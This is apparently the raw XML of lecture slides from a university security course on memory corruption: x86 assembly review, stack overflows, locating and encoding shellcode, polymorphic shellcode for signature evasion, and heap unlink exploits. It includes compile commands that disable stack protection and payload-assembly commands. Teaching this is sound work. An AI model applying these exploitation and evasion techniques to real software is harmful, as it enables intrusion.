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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258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3" r:id="rId28"/>
    <p:sldId id="362" r:id="rId29"/>
    <p:sldId id="364" r:id="rId30"/>
    <p:sldId id="365" r:id="rId31"/>
    <p:sldId id="366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82" r:id="rId45"/>
    <p:sldId id="383" r:id="rId46"/>
    <p:sldId id="384" r:id="rId47"/>
    <p:sldId id="379" r:id="rId48"/>
    <p:sldId id="380" r:id="rId49"/>
    <p:sldId id="381" r:id="rId50"/>
    <p:sldId id="385" r:id="rId51"/>
    <p:sldId id="386" r:id="rId52"/>
    <p:sldId id="387" r:id="rId53"/>
    <p:sldId id="391" r:id="rId54"/>
    <p:sldId id="392" r:id="rId55"/>
    <p:sldId id="393" r:id="rId56"/>
    <p:sldId id="388" r:id="rId57"/>
    <p:sldId id="389" r:id="rId58"/>
    <p:sldId id="390" r:id="rId59"/>
    <p:sldId id="394" r:id="rId60"/>
    <p:sldId id="395" r:id="rId61"/>
    <p:sldId id="396" r:id="rId62"/>
    <p:sldId id="397" r:id="rId63"/>
    <p:sldId id="398" r:id="rId64"/>
    <p:sldId id="399" r:id="rId65"/>
    <p:sldId id="400" r:id="rId66"/>
    <p:sldId id="401" r:id="rId67"/>
    <p:sldId id="403" r:id="rId68"/>
    <p:sldId id="404" r:id="rId69"/>
    <p:sldId id="336" r:id="rId70"/>
    <p:sldId id="405" r:id="rId71"/>
    <p:sldId id="406" r:id="rId72"/>
    <p:sldId id="407" r:id="rId73"/>
    <p:sldId id="408" r:id="rId74"/>
    <p:sldId id="409" r:id="rId75"/>
    <p:sldId id="444" r:id="rId76"/>
    <p:sldId id="445" r:id="rId77"/>
    <p:sldId id="446" r:id="rId78"/>
    <p:sldId id="447" r:id="rId79"/>
    <p:sldId id="448" r:id="rId80"/>
    <p:sldId id="415" r:id="rId81"/>
    <p:sldId id="416" r:id="rId82"/>
    <p:sldId id="417" r:id="rId83"/>
    <p:sldId id="418" r:id="rId84"/>
    <p:sldId id="419" r:id="rId85"/>
    <p:sldId id="420" r:id="rId86"/>
    <p:sldId id="421" r:id="rId87"/>
    <p:sldId id="422" r:id="rId88"/>
    <p:sldId id="423" r:id="rId89"/>
    <p:sldId id="424" r:id="rId90"/>
    <p:sldId id="425" r:id="rId91"/>
    <p:sldId id="426" r:id="rId92"/>
    <p:sldId id="427" r:id="rId93"/>
    <p:sldId id="428" r:id="rId94"/>
    <p:sldId id="429" r:id="rId95"/>
    <p:sldId id="430" r:id="rId96"/>
    <p:sldId id="431" r:id="rId97"/>
    <p:sldId id="432" r:id="rId98"/>
    <p:sldId id="433" r:id="rId99"/>
    <p:sldId id="434" r:id="rId100"/>
    <p:sldId id="435" r:id="rId101"/>
    <p:sldId id="436" r:id="rId102"/>
    <p:sldId id="437" r:id="rId103"/>
    <p:sldId id="438" r:id="rId104"/>
    <p:sldId id="439" r:id="rId105"/>
    <p:sldId id="440" r:id="rId106"/>
    <p:sldId id="441" r:id="rId107"/>
    <p:sldId id="442" r:id="rId108"/>
    <p:sldId id="443" r:id="rId109"/>
    <p:sldId id="478" r:id="rId110"/>
    <p:sldId id="449" r:id="rId111"/>
    <p:sldId id="450" r:id="rId112"/>
    <p:sldId id="451" r:id="rId113"/>
    <p:sldId id="452" r:id="rId114"/>
    <p:sldId id="453" r:id="rId115"/>
    <p:sldId id="454" r:id="rId116"/>
    <p:sldId id="455" r:id="rId117"/>
    <p:sldId id="456" r:id="rId118"/>
    <p:sldId id="457" r:id="rId119"/>
    <p:sldId id="458" r:id="rId120"/>
    <p:sldId id="459" r:id="rId121"/>
    <p:sldId id="460" r:id="rId122"/>
    <p:sldId id="461" r:id="rId123"/>
    <p:sldId id="462" r:id="rId124"/>
    <p:sldId id="463" r:id="rId125"/>
    <p:sldId id="464" r:id="rId126"/>
    <p:sldId id="465" r:id="rId127"/>
    <p:sldId id="466" r:id="rId128"/>
    <p:sldId id="467" r:id="rId129"/>
    <p:sldId id="468" r:id="rId130"/>
    <p:sldId id="469" r:id="rId131"/>
    <p:sldId id="470" r:id="rId132"/>
    <p:sldId id="471" r:id="rId133"/>
    <p:sldId id="472" r:id="rId134"/>
    <p:sldId id="473" r:id="rId135"/>
    <p:sldId id="474" r:id="rId136"/>
    <p:sldId id="475" r:id="rId137"/>
    <p:sldId id="476" r:id="rId138"/>
    <p:sldId id="477" r:id="rId139"/>
    <p:sldId id="530" r:id="rId140"/>
    <p:sldId id="479" r:id="rId141"/>
    <p:sldId id="480" r:id="rId142"/>
    <p:sldId id="481" r:id="rId143"/>
    <p:sldId id="482" r:id="rId144"/>
    <p:sldId id="483" r:id="rId145"/>
    <p:sldId id="484" r:id="rId146"/>
    <p:sldId id="485" r:id="rId147"/>
    <p:sldId id="486" r:id="rId148"/>
    <p:sldId id="487" r:id="rId149"/>
    <p:sldId id="488" r:id="rId150"/>
    <p:sldId id="489" r:id="rId151"/>
    <p:sldId id="490" r:id="rId152"/>
    <p:sldId id="491" r:id="rId153"/>
    <p:sldId id="492" r:id="rId154"/>
    <p:sldId id="493" r:id="rId155"/>
    <p:sldId id="494" r:id="rId156"/>
    <p:sldId id="495" r:id="rId157"/>
    <p:sldId id="496" r:id="rId158"/>
    <p:sldId id="498" r:id="rId159"/>
    <p:sldId id="499" r:id="rId160"/>
    <p:sldId id="500" r:id="rId161"/>
    <p:sldId id="501" r:id="rId162"/>
    <p:sldId id="502" r:id="rId163"/>
    <p:sldId id="503" r:id="rId164"/>
    <p:sldId id="504" r:id="rId165"/>
    <p:sldId id="505" r:id="rId166"/>
    <p:sldId id="506" r:id="rId167"/>
    <p:sldId id="507" r:id="rId168"/>
    <p:sldId id="508" r:id="rId169"/>
    <p:sldId id="509" r:id="rId170"/>
    <p:sldId id="510" r:id="rId171"/>
    <p:sldId id="511" r:id="rId172"/>
    <p:sldId id="512" r:id="rId173"/>
    <p:sldId id="513" r:id="rId174"/>
    <p:sldId id="514" r:id="rId175"/>
    <p:sldId id="515" r:id="rId176"/>
    <p:sldId id="516" r:id="rId177"/>
    <p:sldId id="517" r:id="rId178"/>
    <p:sldId id="518" r:id="rId179"/>
    <p:sldId id="519" r:id="rId180"/>
    <p:sldId id="520" r:id="rId181"/>
    <p:sldId id="521" r:id="rId182"/>
    <p:sldId id="522" r:id="rId183"/>
    <p:sldId id="523" r:id="rId184"/>
    <p:sldId id="524" r:id="rId185"/>
    <p:sldId id="525" r:id="rId186"/>
    <p:sldId id="526" r:id="rId187"/>
    <p:sldId id="527" r:id="rId188"/>
    <p:sldId id="528" r:id="rId189"/>
    <p:sldId id="335" r:id="rId1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7E7E7"/>
    <a:srgbClr val="E9EBF5"/>
    <a:srgbClr val="FCFCFC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9063-64AC-4561-B7DC-B7949D2628B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2AC4-46E6-48DF-9C15-A91B1350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Anybody know what the last ret form is used for?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71026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9" name="Shape 4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 typo has resulted in a one-byte overflow in f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2650424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62" name="Shape 4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Exploit left as an exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1045052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Mostly what we want, but can anyone spot the problems?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1241947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3" name="Shape 4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Why are each of these problems?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>Talk about NOP sled later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="762764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Closer – much smaller, no data segment dependency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>But, overflow is performed with strcp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1262532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7" name="Shape 5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Payloads have to satisfy constraints and transformations to reach the vulnerable code in the form you want</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746272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See the difference from before?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4232348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36" name="Shape 5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What if we re-encode the payload with a fresh key on each use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>Polymorphic shellcode, useful for signature evasion...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1768357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2" name="Shape 5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Very simple, more compact and robust decoders exist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332071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0" name="Shape 5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Our exploit could overwrite itself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378651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4" name="Shape 2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Why is saving everything inefficient?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>So, if a callee wants to use ecx, but the calling convention in force says it cannot be clobbered in a call, what must the callee do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1065526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82" name="Shape 58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Why is needing less precision for return addresses useful?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3664968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22" name="Shape 6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ptmalloc also known as dlmalloc (Doug Lea's malloc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>Exploitation details differ depending on the heap implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>But, targeting vulnerable applications for one platform is still valuable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1687366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32" name="Shape 6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Of course, programs don't have to, but usually don't unless there's a good reason</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="717062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0" name="Shape 68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Unlinking middle chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1677168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Shape 7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66" name="Shape 7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Unsigned arithmetic results in wraparound</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831899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03" name="Shape 9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Function loops over vector of function pointers, executes them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="589000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Why are register arguments good/bad?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>What about x86_64 architecture allows use of register arguments?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379188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Anybody know what the last ret form is used for?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67434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2" name="Shape 3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Why might linear sweep not work well?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>Why might recursive descent be hard? Computed jumps (could be arbitrarily hard...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>Is starting address important? Variable length instruction streams, interleaved instruction streams, self-synchronization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96793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8" name="Shape 3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What are the bytes to the right of the addresses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3851778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Anybody know what the last ret form is used for?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37385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Memory-unsafe: C/C++, programmers can do pointer arithmetic, memory accesses not bounds-checked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831061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43" name="Shape 4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See the problem?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72848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25056" indent="-312528"/>
            <a:lvl3pPr marL="937584" indent="-312528"/>
            <a:lvl4pPr marL="1250112" indent="-312528"/>
            <a:lvl5pPr marL="1562640" indent="-312528"/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37029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5344680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722168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3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345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8626"/>
            <a:ext cx="5157787" cy="4574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345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8626"/>
            <a:ext cx="5183188" cy="45740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690995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351155"/>
            <a:ext cx="727364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9999" y="6366741"/>
            <a:ext cx="640773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earlham.edu/~psg/tutorials/gdb_quickref.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wkr.io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4740/6740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7: Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Assembly Review, Basic Exploits)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166939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Registers (32 bit)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7286" y="1230084"/>
            <a:ext cx="8817428" cy="5540828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>General purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EAX, EBX, ECX, EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for pretty much anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESP: Points to the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The stack grows down, so this is the lowest address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EBP: Points to the bottom of the current stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not strictly necessary, may be used as a general purpose register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EIP: Points to the currently executing instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EFLAGS: Bit vector of flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stores things like carry (after addition), equals zero (after a comparison),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53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Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55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5951" y="1463252"/>
            <a:ext cx="3840100" cy="46683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146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Locating the Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 5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In our case, we could go for either the frame copy, or the original argument copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>What problem could we run into if we use the frame buffer copy?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Let's do the latter for this exploit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>How to find the address of the argument buffer?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Could calculate it statically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, it's faster to debug and pull out the addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120574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Locating the Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Shape 563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96273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lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047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47" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>ggdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> -O0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>fPIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>fPIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047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47" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>vuln.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2047" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> –f bin –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>payload.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> payload.asm</a:t>
            </a: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lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> –f bin –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2047" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
